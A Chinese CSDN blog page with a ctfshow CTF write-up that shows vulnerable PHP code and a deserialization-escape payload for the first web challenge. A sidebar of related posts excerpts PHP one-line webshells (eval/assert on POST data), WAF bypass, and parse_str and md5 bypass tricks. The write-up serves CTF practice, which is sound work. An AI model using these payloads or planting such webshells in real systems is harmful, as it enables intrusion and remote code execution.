ctfshow 月饼杯

最新推荐文章于 2023-05-07 22:34:04 发布
最新推荐文章于 2023-05-07 22:34:04 发布
阅读量352 收藏
点赞数
分类专栏: CTF题目 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45655564/article/details/120058503
版权
web1_此夜圆一个简单的反序列化逃逸<?phperror_reporting(0);class a{ public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname; $this->password=$password; } public function __wakeup() { if($this->pa
摘要由CSDN通过智能技术生成

web1_此夜圆

一个简单的反序列化逃逸

<?php
error_reporting(0);

class a
{
   
	public $uname;
	public $password;
	public function __construct($uname,$password)
	{
   
		$this->uname=$uname;
		$this->password=$password;
	}
	public function __wakeup()
	{
   
			if($this->password==='yu22x')
			{
   
				include('flag.php');
				echo $flag;	
			}
			else
			{
   
				echo 'wrong password';
			}
		}
	}

function filter($string){
   
    return str_replace('Firebasky','Firebaskyup',$string);
}

$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>

这里是我们传进入$uname的值,这是我们唯一可控制的,目的是让password为yu22x
所以,就可以利用这个字符替换来逃逸

这里我们需要逃逸的是这样一个值

";s:8:"password";s:5:"yu22x";}

总共30个字符,然后每次替换就会多出2个字符,所以需要15个Firebasky来进行替换。
所以payload就是

FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}

web2_故人心

<?php
最低0.47元/天 解锁文章
Anfy1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
中秋月饼中秋月饼中秋月饼
01-30
中秋月饼
PHP一句话木马及绕waf思路
weixin_42299610的博客
03-23 2073
PHP一句话木马: 1 .eval(): <?php @eval($_POST['-7']); ?> eval函数将接受的字符串当做代码执行。 2.assert(): <?php @assert ($_POST['-7']); ?> assert函数将接受的字符串当做代码执行 。 3.preg_replace(): <?php @preg_replace("/...
CTF PHP代码审计 parse_str()函数 md5值弱类型比较 条件竞争
baynk的博客
03-22 895
一进来就是PHP代码审计。 <?php include"url.php"; highlight_file(__FILE__); $a[0] = 'wenhua3104'; $id = $_GET['id']; //传入ID参数 @parse_str($id); //将变量ID进行参数化。 if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5...
php变量覆盖,变量覆盖漏洞----parse_str()函数
weixin_42405371的博客
03-10 560
Parse_str()函数引起的变量覆盖漏洞parse_str() 函数用于把查询字符串解析到变量中,如果没有array 参数,则由该函数设置的变量将覆盖已存在的同名变量。 极度不建议 在没有 array参数的情况下使用此函数,并且在 PHP 7.2 中将废弃不设置参数的行为。此函数没有返回值一、分析题目源码:1、 error_reporting()函数规定不同级别错误,这里为关闭错误报告2、 ...
CTF学习笔记:php(变量覆盖)
a12332251的博客
12-06 745
php变量覆盖
代码审计--变量覆盖漏洞
Hydra的博客
10-30 1668
可能会导致变量覆盖漏洞的函数有parse_str(),extract(),import_request_variables()以及$$。 1.parse_str()导致的漏洞 &lt;!-- parse_str($a = $_GET['flag']); if ($bdctf == "BCDEF") { echo $flag; } --&gt; 源码分析:a获得一个get值$fl...
月饼小游戏
10-26
在“吃月饼大赛”中,我们需要在canvas上绘制月饼以及玩家角色。使用JavaScript的`CanvasRenderingContext2D`对象可以实现这一目标,通过`fillRect()`或`drawImage()`方法来绘制月饼和角色。 接下来是事件监听。在...
月饼PPT插图素材
07-16
标题中的“月饼PPT插图素材”指的是一个专门设计用于制作与中秋节相关的PPT演示文稿的图形资源集合。这些插图通常包含各种与月饼和中秋节文化相关的元素,如月饼的图案、中秋月亮、兔子(月兔)、灯笼、团圆场景等,...
中秋节月饼礼盒模板
08-24
【标题】"中秋节月饼礼盒模板"所涉及的知识点主要集中在设计领域,特别是平面设计和包装设计方面。在设计行业中,模板通常是为了方便快速创建符合特定主题或节日的设计元素,节省时间和精力。中秋节是中国传统的重要...
月饼食品公司网页模板
01-18
月饼食品公司网页模板】是一种专门针对月饼销售和食品行业的网站设计模板,旨在为这类企业提供一个快速、便捷的在线展示平台。网页模板是预先设计好的网页结构和布局,包括色彩搭配、图片选择、字体风格等元素,...
【红日Day7-CTF】parse_str函数缺陷漏洞
PZ的博客
01-13 1525
练习记录 复现代码: index.php <?php $a = "hongri"; $id = $_GET['id']; @parse_str($id); if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) { echo '<a href="flag.php">flag is here</a...
parse str php ctf,CTF-代码审计(1)——parse_str()变量覆盖
weixin_31830389的博客
03-25 280
题目连接:http://222.18.158.226:7000/iscc.php考点:parse_str()变量覆盖代码: PHP知识点:1.parse_url()参照网址:https://www.php.net/manual/zh/function.parse-url.php 2.$_SERVER[]参考网址:https://php.net/manual/zh/reserved.variabl...
关于MD5函数的绕过
since_2020的博客
08-09 1050
MD5 一、md5($password,true)导致的注入 某次刷题中遇到返回包有这个 HTTP/1.1 200 OK Server: openresty Date: Mon, 09 Aug 2021 10:08:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Hint: select * from 'admin' where password=md5($pass,true) X-Powered-By: PHP/7.3.13
ctfshow web篇月饼
读书 买花 长大
01-05 303
月饼
月饼II
记录学习,一起进步
05-07 585
月饼2021web方向wp
PHP之黑魔法
极光时流
10-28 1064
PHP之黑魔法一、要求变量原值不同但md5或sha1相同的情况下二、Strcmp利用数组绕过三、当有两个is_numeric判断并用and连接时,and后面的is_numeric可以绕过四、Eregi匹配五、接收参数$a得存在,并且$a==0可用.绕过(非数字都可绕过)六、is_numeric绕过七、既是0又是1的情况如何插入一段漂亮的代码片八 、转换问题 一、要求变量原值不同但md5或sha1相...
ctfshow 月饼(第二届) 部分WriteUp
mumuzi的博客
09-21 2713
Misc 杂项签到 右键附件,从链接另存文件。然后用16进制编辑器或者你想用notepad也彳亍看文件尾,有一串base64,解码即可。 ctfshow{we1come_to_mooncake_cap} 有手就行 查看exif,有一串阿拉伯语,翻译过来是“你知道汉明码吗” 查看图片文件尾,发现一串数字 10110110111 然后随便找一篇看一下是怎么编码的,以及如何纠错的 https://blog.csdn.net/qq_19782019/article/details/87452394 例子他举的也
php get a get b,[CTF]CTF中if (md5(md5($_GET[‘a’])) == md5($_GET[‘b’])) 的绕过
weixin_42540248的博客
03-23 920
0X00 摘要CTF中md5判等可使用0e绕过,但是如果是双md5该如何绕过呢?本文将教你如何绕过md5(md5($_GET[‘a’])) == md5($_GET[b’])。0X01 引言在php中,所有变量都是若类型的,在使用if判等的时候要格外小心,使用特殊的参数可能会使本来不相等的if判断位相等,比如下面的例子。if (isset($_GET['a']) && isset(...
ctfshow刷题 [struts2]
weixin_44807430的博客
01-08 543
纯粹且坚持
月饼词云python
最新发布
09-16
月饼词云的制作涉及到Python中的数据分析和可视化技术。您可以使用Python的数据分析库(如pandas)和可视化库(如matplotlib或WordCloud)来处理和展示月饼的数据。您可以按照以下步骤进行操作: 1. 导入所需的库,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值